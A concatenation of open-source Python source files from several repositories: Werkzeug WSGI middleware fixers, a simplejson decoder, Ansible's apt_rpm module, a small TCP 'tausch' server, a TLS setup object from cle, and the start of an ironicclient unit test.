Added `app_root` parameter and renamed from `LighttpdCGIRootFix`.
:param app: the WSGI application
:param app_root: Defaulting to ``'/'``, you can set this to something else
if your app is mounted somewhere else.
"""
def __init__(self, app, app_root='/'):
self.app = app
self.app_root = app_root
def __call__(self, environ, start_response):
# only set PATH_INFO for older versions of Lighty or if no
# server software is provided. That's because the test was
# added in newer Werkzeug versions and we don't want to break
# people's code if they are using this fixer in a test that
# does not set the SERVER_SOFTWARE key.
if 'SERVER_SOFTWARE' not in environ or \
environ['SERVER_SOFTWARE'] < 'lighttpd/1.4.28':
environ['PATH_INFO'] = environ.get('SCRIPT_NAME', '') + \
environ.get('PATH_INFO', '')
environ['SCRIPT_NAME'] = self.app_root.strip('/')
return self.app(environ, start_response)
# backwards compatibility
LighttpdCGIRootFix = CGIRootFix
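# Illustrative usage (the mount point '/myapp' is an example):
#   application = CGIRootFix(application, app_root='/myapp')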
class PathInfoFromRequestUriFix(object):
    On Windows, environment variables are limited to the system charset,
    which makes it impossible to store the `PATH_INFO` variable in the
environment without loss of information on some systems.
This is for example a problem for CGI scripts on a Windows Apache.
This fixer works by recreating the `PATH_INFO` from `REQUEST_URI`,
`REQUEST_URL`, or `UNENCODED_URL` (whatever is available). Thus the
fix can only be applied if the webserver supports either of these
variables.
:param app: the WSGI application
"""
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
for key in 'REQUEST_URL', 'REQUEST_URI', 'UNENCODED_URL':
if key not in environ:
continue
request_uri = unquote(environ[key])
script_name = unquote(environ.get('SCRIPT_NAME', ''))
if request_uri.startswith(script_name):
environ['PATH_INFO'] = request_uri[len(script_name):] \
.split('?', 1)[0]
break
return self.app(environ, start_response)
class ProxyFix(object):
"""This middleware can be applied to add HTTP proxy support to an
application that was not designed with HTTP proxies in mind. It
sets `REMOTE_ADDR`, `HTTP_HOST` from `X-Forwarded` headers. While
Werkzeug-based applications already can use
:py:func:`werkzeug.wsgi.get_host` to retrieve the current host even if
behind proxy setups, this middleware can be used for applications which
access the WSGI environment directly.
If you have more than one proxy server in front of your app, set
`num_proxies` accordingly.
Do not use this middleware in non-proxy setups for security reasons.
The original values of `REMOTE_ADDR` and `HTTP_HOST` are stored in
the WSGI environment as `werkzeug.proxy_fix.orig_remote_addr` and
`werkzeug.proxy_fix.orig_http_host`.
:param app: the WSGI application
:param num_proxies: the number of proxy servers in front of the app.
"""
def __init__(self, app, num_proxies=1):
self.app = app
self.num_proxies = num_proxies
def get_remote_addr(self, forwarded_for):
"""Selects the new remote addr from the given list of ips in
X-Forwarded-For. By default it picks the one that the `num_proxies`
proxy server provides. Before 0.9 it would always pick the first.
.. versionadded:: 0.8
"""
if len(forwarded_for) >= self.num_proxies:
return forwarded_for[-1 * self.num_proxies]
def __call__(self, environ, start_response):
getter = environ.get
forwarded_proto = getter('HTTP_X_FORWARDED_PROTO', '')
forwarded_for = getter('HTTP_X_FORWARDED_FOR', '').split(',')
forwarded_host = getter('HTTP_X_FORWARDED_HOST', '')
environ.update({
'werkzeug.proxy_fix.orig_wsgi_url_scheme': getter('wsgi.url_scheme'),
'werkzeug.proxy_fix.orig_remote_addr': getter('REMOTE_ADDR'),
'werkzeug.proxy_fix.orig_http_host': getter('HTTP_HOST')
})
forwarded_for = [x for x in [x.strip() for x in forwarded_for] if x]
remote_addr = self.get_remote_addr(forwarded_for)
if remote_addr is not None:
environ['REMOTE_ADDR'] = remote_addr
if forwarded_host:
environ['HTTP_HOST'] = forwarded_host
if forwarded_proto:
environ['wsgi.url_scheme'] = forwarded_proto
return self.app(environ, start_response)
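# Illustrative usage for an app behind a single proxy (Flask-style object
# shown as an example; any WSGI callable works the same way):
#   app.wsgi_app = ProxyFix(app.wsgi_app, num_proxies=1)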
class HeaderRewriterFix(object):
"""This middleware can remove response headers and add others. This
    is, for example, useful to remove the `Date` header from responses if you
    are using a server that adds that header whether it is already present or
    not, or to add `X-Powered-By` headers::
app = HeaderRewriterFix(app, remove_headers=['Date'],
add_headers=[('X-Powered-By', 'WSGI')])
:param app: the WSGI application
:param remove_headers: a sequence of header keys that should be
removed.
:param add_headers: a sequence of ``(key, value)`` tuples that should
be added.
"""
def __init__(self, app, remove_headers=None, add_headers=None):
self.app = app
self.remove_headers = set(x.lower() for x in (remove_headers or ()))
self.add_headers = list(add_headers or ())
def __call__(self, environ, start_response):
def rewriting_start_response(status, headers, exc_info=None):
new_headers = []
for key, value in headers:
if key.lower() not in self.remove_headers:
new_headers.append((key, value))
new_headers += self.add_headers
return start_response(status, new_headers, exc_info)
return self.app(environ, rewriting_start_response)
class InternetExplorerFix(object):
"""This middleware fixes a couple of bugs with Microsoft Internet
Explorer. Currently the following fixes are applied:
    - removal of `Vary` headers for unsupported mimetypes, which
      causes trouble with caching. Can be disabled by passing
``fix_vary=False`` to the constructor.
see: http://support.microsoft.com/kb/824847/en-us
- removes offending headers to work around caching bugs in
Internet Explorer if `Content-Disposition` is set. Can be
disabled by passing ``fix_attach=False`` to the constructor.
If it does not detect affected Internet Explorer versions it won't touch
the request / response.
"""
# This code was inspired by Django fixers for the same bugs. The
# fix_vary and fix_attach fixers were originally implemented in Django
    # by Michael Axiak and are available as part of the Django project:
# http://code.djangoproject.com/ticket/4148
def __init__(self, app, fix_vary=True, fix_attach=True):
self.app = app
self.fix_vary = fix_vary
self.fix_attach = fix_attach
def fix_headers(self, environ, headers, status=None):
if self.fix_vary:
header = headers.get('content-type', '')
mimetype, options = parse_options_header(header)
if mimetype not in ('text/html', 'text/plain', 'text/sgml'):
headers.pop('vary', None)
if self.fix_attach and 'content-disposition' in headers:
pragma = parse_set_header(headers.get('pragma', ''))
pragma.discard('no-cache')
header = pragma.to_header()
if not header:
headers.pop('pragma', '')
else:
headers['Pragma'] = header
header = headers.get('cache-control', '')
if header:
cc = parse_cache_control_header(header,
cls=ResponseCacheControl)
cc.no_cache = None
cc.no_store = False
header = cc.to_header()
if not header:
headers.pop('cache-control', '')
else:
headers['Cache-Control'] = header
def run_fixed(self, environ, start_response):
def fixing_start_response(status, headers, exc_info=None):
headers = Headers(headers)
self.fix_headers(environ, headers, status)
return start_response(status, headers.to_wsgi_list(), exc_info)
return self.app(environ, fixing_start_response)
def __call__(self, environ, start_response):
ua = UserAgent(environ)
if ua.browser != 'msie':
return self.app(environ, start_response)
return self.run_fixed(environ, start_response)
|
liefdiy/bite-project
|
refs/heads/master
|
deps/mrtaskman/server/mapreduce/lib/simplejson/decoder.py
|
77
|
#!/usr/bin/env python
"""Implementation of JSONDecoder
"""
import re
import sys
import struct
from mapreduce.lib.simplejson.scanner import make_scanner
try:
from mapreduce.lib.simplejson._speedups import scanstring as c_scanstring
except ImportError:
c_scanstring = None
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
def linecol(doc, pos):
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _speedups
lineno, colno = linecol(doc, pos)
if end is None:
return '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
return '%s: line %d column %d - line %d column %d (char %d - %d)' % (
msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True, _b=BACKSLASH, _m=STRINGCHUNK.match):
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
end = chunk.end()
content, terminator = chunk.groups()
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
if terminator == '"':
break
elif terminator != '\\':
if strict:
raise ValueError(errmsg("Invalid control character %r at", s, end))
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
if esc != 'u':
try:
m = _b[esc]
except KeyError:
raise ValueError(
errmsg("Invalid \\escape: %r" % (esc,), s, end))
end += 1
else:
esc = s[end + 1:end + 5]
next_end = end + 5
msg = "Invalid \\uXXXX escape"
try:
if len(esc) != 4:
raise ValueError
uni = int(esc, 16)
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise ValueError
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise ValueError
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
m = unichr(uni)
except ValueError:
raise ValueError(errmsg(msg, s, end))
end = next_end
_append(m)
return u''.join(chunks), end
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject((s, end), encoding, strict, scan_once, object_hook, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
pairs = {}
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
return pairs, end + 1
elif nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end))
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting : delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
pairs[key] = value
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end - 1))
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray((s, end), scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
        Note that currently only encodings that are a superset of ASCII work;
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
"""
self.encoding = encoding
self.object_hook = object_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.scan_once = make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode`` beginning
with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
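# --- Usage sketch (not part of the original module; illustrative only) ---
# decode() requires the whole string to be a single JSON document, while raw_decode()
# stops at the end of the first value and reports the index it reached, which is how
# trailing data is tolerated:
#
#   decoder = JSONDecoder()
#   decoder.decode('{"a": [1, 2.5, null, true]}')   # -> {u'a': [1, 2.5, None, True]}
#   decoder.raw_decode('{"a": 1} trailing text')    # -> ({u'a': 1}, 8)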
|
simonwydooghe/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/apt_rpm.py
|
79
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2013, Evgenii Terechkov
# Written by Evgenii Terechkov <evg@altlinux.org>
# Based on urpmi module written by Philippe Makowski <philippem@mageia.org>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: apt_rpm
short_description: apt_rpm package manager
description:
- Manages packages with I(apt-rpm). Both low-level (I(rpm)) and high-level (I(apt-get)) package manager binaries required.
version_added: "1.5"
options:
pkg:
description:
- name of package to install, upgrade or remove.
required: true
state:
description:
- Indicates the desired package state.
choices: [ absent, present ]
default: present
update_cache:
description:
- update the package database first C(apt-get update).
type: bool
default: 'no'
author:
- Evgenii Terechkov (@evgkrsk)
'''
EXAMPLES = '''
- name: Install package foo
apt_rpm:
pkg: foo
state: present
- name: Remove package foo
apt_rpm:
pkg: foo
state: absent
- name: Remove packages foo and bar
apt_rpm:
pkg: foo,bar
state: absent
# bar will be updated if a newer version exists
- name: Update the package database and install bar
apt_rpm:
name: bar
state: present
update_cache: yes
'''
import json
import os
import shlex
import sys
from ansible.module_utils.basic import AnsibleModule
APT_PATH = "/usr/bin/apt-get"
RPM_PATH = "/usr/bin/rpm"
def query_package(module, name):
# rpm -q returns 0 if the package is installed,
# 1 if it is not installed
rc, out, err = module.run_command("%s -q %s" % (RPM_PATH, name))
if rc == 0:
return True
else:
return False
def query_package_provides(module, name):
# rpm -q returns 0 if the package is installed,
# 1 if it is not installed
rc, out, err = module.run_command("%s -q --provides %s" % (RPM_PATH, name))
return rc == 0
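# A hedged sketch (not part of the original module) of the check both query helpers
# above rely on: only rpm's exit status matters, stdout/stderr are ignored.
#
#   rc, out, err = module.run_command("%s -q bash" % RPM_PATH)
#   installed = (rc == 0)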
def update_package_db(module):
rc, out, err = module.run_command("%s update" % APT_PATH)
if rc != 0:
module.fail_json(msg="could not update package db: %s" % err)
def remove_packages(module, packages):
remove_c = 0
# Using a for loop in case of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, package):
continue
rc, out, err = module.run_command("%s -y remove %s" % (APT_PATH, package))
if rc != 0:
module.fail_json(msg="failed to remove %s: %s" % (package, err))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, pkgspec):
packages = ""
for package in pkgspec:
if not query_package_provides(module, package):
packages += "'%s' " % package
if len(packages) != 0:
rc, out, err = module.run_command("%s -y install %s" % (APT_PATH, packages))
installed = True
        for package in pkgspec:
if not query_package_provides(module, package):
installed = False
# apt-rpm always have 0 for exit code if --force is used
if rc or not installed:
module.fail_json(msg="'apt-get -y install %s' failed: %s" % (packages, err))
else:
module.exit_json(changed=True, msg="%s present(s)" % packages)
else:
module.exit_json(changed=False)
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default='installed', choices=['absent', 'installed', 'present', 'removed']),
update_cache=dict(type='bool', default=False, aliases=['update-cache']),
package=dict(type='str', required=True, aliases=['name', 'pkg']),
),
)
if not os.path.exists(APT_PATH) or not os.path.exists(RPM_PATH):
module.fail_json(msg="cannot find /usr/bin/apt-get and/or /usr/bin/rpm")
p = module.params
if p['update_cache']:
update_package_db(module)
packages = p['package'].split(',')
if p['state'] in ['installed', 'present']:
install_packages(module, packages)
elif p['state'] in ['absent', 'removed']:
remove_packages(module, packages)
if __name__ == '__main__':
main()
|
petersn/tausch
|
refs/heads/master
|
tausch_server.py
|
1
|
#! /usr/bin/python
"""
Tausch server.
"""
handshake_string = "tausch\1\0\0\0"
import SocketServer, traceback, socket, threading, os, time, struct, json, Queue, random, logging
rng = random.SystemRandom()
# This lock synchronizes access to the Context.
main_lock = threading.Lock()
class Context:
config = {
# Round length in seconds.
"interval": 60.0,
}
def __init__(self):
self.users = set()
self.start_time = time.time()
def get_general_info(self):
return {
"users": len(self.users),
"time": time.time(),
"start_time": self.start_time,
"config": self.config,
}
def new_user(self, handler):
print "New user:", handler
self.users.add(handler)
def del_user(self, handler):
print "Del user:", handler
self.users.remove(handler)
def get_workload(self, handler):
return ""
def put_workload(self, handler, dataset):
print "Work completed."
def begin_new_round(self):
# Compute the workloads for each stream.
# These lists of selectors are indexed by stream.
self.workload_by_uuid = {}
for user in self.users:
for index, sub in user.subscriptions.iteritems():
for uuid, selector in sub.iteritems():
if uuid not in self.workload_by_uuid:
						self.workload_by_uuid[uuid] = []
self.workload_by_uuid[uuid].append((user, index, selector))
class Stream:
def __init__(self):
self.blocks = []
class Subscription:
def __init__(self):
self.blocks = []
self.selectors = {}
ctx = Context()
class CoordinatorThread(threading.Thread):
def run(self):
while True:
time.sleep(1)
with main_lock:
ctx.begin_new_round()
# If the workload is empty, wait.
				if not ctx.workload_by_uuid:
					time.sleep(100)
CoordinatorThread().start()
class TauschServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
allow_reuse_address = True
class TauschHandler(SocketServer.StreamRequestHandler):
def handle(self):
# Perform the handshake.
self.send(handshake_string)
reply = self.rfile.read(len(handshake_string))
if reply != handshake_string:
return
# Basic user information.
self.balance = 0.0
self.trust = 0.0
self.config = {
"max_conns": 0,
"max_opers": 0,
"tune_opers_per_conn": 1.0,
# "short_tag": "",
# "long_tag": "",
}
self.streams = {}
self.subscriptions = {}
# Reset all cached user state.
self.cmd_amnesia()
# Report ourself to Context.
with main_lock:
ctx.new_user(self)
command_dispatch = {
"a": self.cmd_user_info,
"b": self.cmd_general_info,
"c": self.cmd_get_stream_updates,
"d": self.cmd_amnesia,
"e": self.cmd_set_var,
"f": self.cmd_get_var,
"g": self.cmd_new_stream,
"h": self.cmd_del_stream,
"i": self.cmd_new_subscription,
"j": self.cmd_del_subscription,
"k": self.cmd_set_selector,
"l": self.cmd_get_workload,
"m": self.cmd_put_workload,
"n": self.cmd_block_to_stream,
"o": self.cmd_blocks_from_subscription,
}
# Begin processing commands.
self.good = True
while self.good:
command = self.rfile.read(1)
if command not in command_dispatch:
return
command_dispatch[command]()
def finish(self):
with main_lock:
ctx.del_user(self)
def send(self, s):
self.wfile.write(s)
self.wfile.flush()
def send_blob(self, s):
if not isinstance(s, str):
s = json.dumps(s)
self.send(self.length_encode(s))
def length_encode(self, s):
return struct.pack("<I", len(s)) + s
def get_blob(self, maxlen):
length, = struct.unpack("<I", self.rfile.read(4))
if length > maxlen:
print "Lengths:", length, maxlen
print "Protocol violation."
self.good = False
return
return self.rfile.read(length)
def cmd_user_info(self):
with main_lock:
s = json.dumps({
"balance": self.balance,
"config": self.config,
"streams": self.streams.keys(),
"subscriptions": [(k, len(v.blocks)) for k, v in self.subscriptions.iteritems()],
})
self.send_blob(s)
def cmd_general_info(self):
with main_lock:
info = ctx.get_general_info()
self.send_blob(info)
def cmd_get_stream_updates(self):
with main_lock:
new_streams = set()
for user in ctx.users:
new_streams.update(user.streams.iterkeys())
diffs = []
# Find the deleted streams.
for stream in self.known_streams:
if stream not in new_streams:
diffs.append("d" + stream.decode("hex"))
# Find the new streams.
for stream in new_streams:
if stream not in self.known_streams:
diffs.append("a" + stream.decode("hex"))
# Update our cache.
self.known_streams = new_streams
# Send the user the list of diffs.
s = "".join(diffs)
self.send_blob(s)
def cmd_amnesia(self):
self.known_streams = set()
def cmd_set_var(self):
var = self.get_blob(16)
value = self.get_blob(8192)
success = var in self.config
if success:
# Attempt to cast the value to the appropriate type.
try:
self.config[var] = type(self.config[var])(value)
except ValueError:
success = False
self.send_blob("01"[success])
def cmd_get_var(self):
var = self.get_blob(16)
value = str(self.config.get(var, ""))
self.send_blob(value)
def cmd_new_stream(self):
raw_uuid = os.urandom(20)
uuid = raw_uuid.encode("hex")
with main_lock:
self.streams[uuid] = Stream()
self.send_blob(raw_uuid)
def cmd_del_stream(self):
uuid = self.get_blob(20).encode("hex")
with main_lock:
self.send_blob("01"[uuid in self.streams])
if uuid in self.streams:
self.streams.pop(uuid)
def cmd_new_subscription(self):
index = len(self.subscriptions)
self.subscriptions[index] = Subscription()
self.send_blob(struct.pack("<I", index))
def cmd_del_subscription(self):
s = self.get_blob(4)
if len(s) != 4:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
with main_lock:
self.send_blob("01"[index in self.subscriptions])
if index in self.subscriptions:
self.subscriptions.pop(index)
def cmd_set_selector(self):
s, raw_uuid = self.get_blob(4), self.get_blob(20)
if len(s) != 4 or len(raw_uuid) != 20:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
uuid = raw_uuid.encode("hex")
selector = self.get_blob(4096)
with main_lock:
flag = index in self.subscriptions and \
uuid in self.known_streams
self.send_blob("01"[flag])
if flag:
self.subscriptions[index].selectors[uuid] = selector
def cmd_get_workload(self):
with main_lock:
workload = ctx.get_workload(self)
self.send_blob(workload)
def cmd_put_workload(self):
dataset = self.get_blob(2**20)
with main_lock:
success = ctx.put_workload(self, dataset)
self.send_blob("01"[success])
def cmd_block_to_stream(self):
raw_uuid = self.get_blob(20)
if len(raw_uuid) != 20:
print "Protocol violation."
self.good = False
return
uuid = raw_uuid.encode("hex")
block = self.get_blob(4096)
with main_lock:
self.send_blob("01"[uuid in self.streams])
if uuid in self.streams:
self.streams[uuid].blocks.append(block)
def cmd_blocks_from_subscription(self):
s = self.get_blob(4)
if len(s) != 4:
print "Protocol violation."
self.good = False
return
index, = struct.unpack("<I", s)
with main_lock:
self.send_blob("01"[index in self.subscriptions])
if index in self.subscriptions:
sub = self.subscriptions[index]
s = "".join(map(self.length_encode, sub.blocks))
sub.blocks = []
self.send_blob(s)
HOST = ""
PORT = 50506
TauschServer((HOST, PORT), TauschHandler).serve_forever()
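# A minimal client sketch (assumption: illustrative only, not part of the original
# server). It mirrors the protocol handled above: echo the handshake string back,
# send the one-byte "b" command, then read one length-prefixed JSON blob produced by
# cmd_general_info().
#
#   import socket, struct, json
#   sock = socket.create_connection(("localhost", PORT))
#   assert sock.recv(len(handshake_string)) == handshake_string
#   sock.sendall(handshake_string)
#   sock.sendall("b")
#   length, = struct.unpack("<I", sock.recv(4))
#   print json.loads(sock.recv(length))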
|
pewpewsecure/cle
|
refs/heads/master
|
cle/tls.py
|
1
|
from collections import namedtuple, defaultdict
import struct
from .backends import Backend
from .memory import Clemory
TLSArchInfo = namedtuple('TLSArchInfo', ('variant', 'tcbhead_size', 'head_offsets', 'dtv_offsets', 'pthread_offsets'))
tls_archinfo = {
'AMD64': TLSArchInfo( 2, 704, [16], [8], [0] ),
'X86': TLSArchInfo( 2, 56, [8], [4], [0] ),
'AARCH64': TLSArchInfo( 1, 32, [], [0], [] ),
'ARM': TLSArchInfo( 1, 32, [], [0], [] ),
'ARMEL': TLSArchInfo( 1, 8, [], [0], [] ),
'ARMHF': TLSArchInfo( 1, 8, [], [0], [] ),
'MIPS32': TLSArchInfo( 1, 8, [], [0], [] ),
'MIPS64': TLSArchInfo( 1, 16, [], [0], [] ),
'PPC32': TLSArchInfo( 1, 52, [], [48], [] ),
'PPC64': TLSArchInfo( 1, 92, [], [84], [] ),
}
TLS_BLOCK_ALIGN = 0x10
TLS_TOTAL_HEAD_SIZE = 0x4000
TLS_HEAD_ALIGN = 0x10000
TLS_DTV_INITIAL_CAPACITY = 0x10
TLS_ALLOC_SIZE = 0x30000
def roundup(val, to=TLS_BLOCK_ALIGN):
#val -= 1
#diff = to - (val % to)
#val += diff
#return val
return val - 1 + (to - ((val - 1) % to))
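# Worked examples of the identity above (a sketch equivalent to the commented-out steps):
# values already on a boundary are unchanged, anything else is bumped to the next multiple.
#   roundup(0x10) == 0x10
#   roundup(0x11) == 0x20
#   roundup(0x31, to=TLS_HEAD_ALIGN) == 0x10000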
class TLSObj(Backend):
def __init__(self, modules):
super(TLSObj, self).__init__('##cle_tls##')
self.modules = modules
self.arch = self.modules[0].arch
self.memory = Clemory(self.arch)
self.tlsinfo = tls_archinfo[self.arch.name]
module_id = 1
self.total_blocks_size = 0
for module in modules:
module.tls_module_id = module_id
module_id += 1
module.tls_block_offset = self.total_blocks_size
self.total_blocks_size += roundup(module.tls_block_size)
self.total_blocks_size = roundup(self.total_blocks_size, TLS_HEAD_ALIGN)
for module in modules:
if self.tlsinfo.variant == 1:
module.tls_block_offset += TLS_TOTAL_HEAD_SIZE
else:
module.tls_block_offset = -roundup(module.tls_block_size) - module.tls_block_offset
self.dtv_start = TLS_TOTAL_HEAD_SIZE + 2*self.arch.bytes
self.tp_offset = 0 if self.tlsinfo.variant == 1 else self.total_blocks_size
def finalize(self):
assert self.rebase_addr != 0
temp_dict = defaultdict(lambda: '\0')
def drop(string, offset):
for i, c in enumerate(string):
temp_dict[i + offset] = c
def drop_int(num, offset):
drop(struct.pack(self.arch.struct_fmt(), num), offset)
# Set the appropriate pointers in the tcbhead
for off in self.tlsinfo.head_offsets:
drop_int(self.thread_pointer, off + self.tp_offset)
for off in self.tlsinfo.dtv_offsets:
drop_int(self.rebase_addr + self.dtv_start, off + self.tp_offset)
for off in self.tlsinfo.pthread_offsets:
drop_int(self.thread_pointer, off + self.tp_offset) # ?????
# Write the init images from each of the modules' tdata sections
for module in self.modules:
module.memory.seek(module.tls_tdata_start)
drop(module.memory.read(module.tls_tdata_size), self.tp_offset + module.tls_block_offset)
# Set up the DTV
# TODO: lmao capacity it's 2:30am please help me
drop_int(TLS_DTV_INITIAL_CAPACITY-1, self.dtv_start - 2*self.arch.bytes)
drop_int(len(self.modules), self.dtv_start)
for module in self.modules:
drop_int(self.tp_offset + module.tls_block_offset, self.dtv_start + (2*self.arch.bytes)*module.tls_module_id)
drop_int(1, self.dtv_start + (2*self.arch.bytes)*module.tls_module_id + self.arch.bytes)
self.memory.add_backer(0, ''.join(temp_dict[i] for i in xrange(0, TLS_ALLOC_SIZE)))
@property
def thread_pointer(self):
return self.rebase_addr + self.tp_offset
def get_min_addr(self):
return self.rebase_addr
def get_max_addr(self):
return TLS_ALLOC_SIZE + self.rebase_addr
def get_addr(self, module_id, offset):
'''
basically __tls_get_addr
'''
return self.thread_pointer + self.modules[module_id-1].tls_block_offset + offset
|
NaohiroTamura/python-ironicclient
|
refs/heads/master
|
ironicclient/tests/unit/test_client.py
|
1
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from keystoneauth1 import loading as kaloading
from ironicclient import client as iroclient
from ironicclient.common import filecache
from ironicclient.common import http
from ironicclient import exc
from ironicclient.tests.unit import utils
from ironicclient.v1 import client as v1
class ClientTest(utils.BaseTestCase):
def test_get_client_with_auth_token_ironic_url(self):
kwargs = {
'ironic_url': 'http://ironic.example.org:6385/',
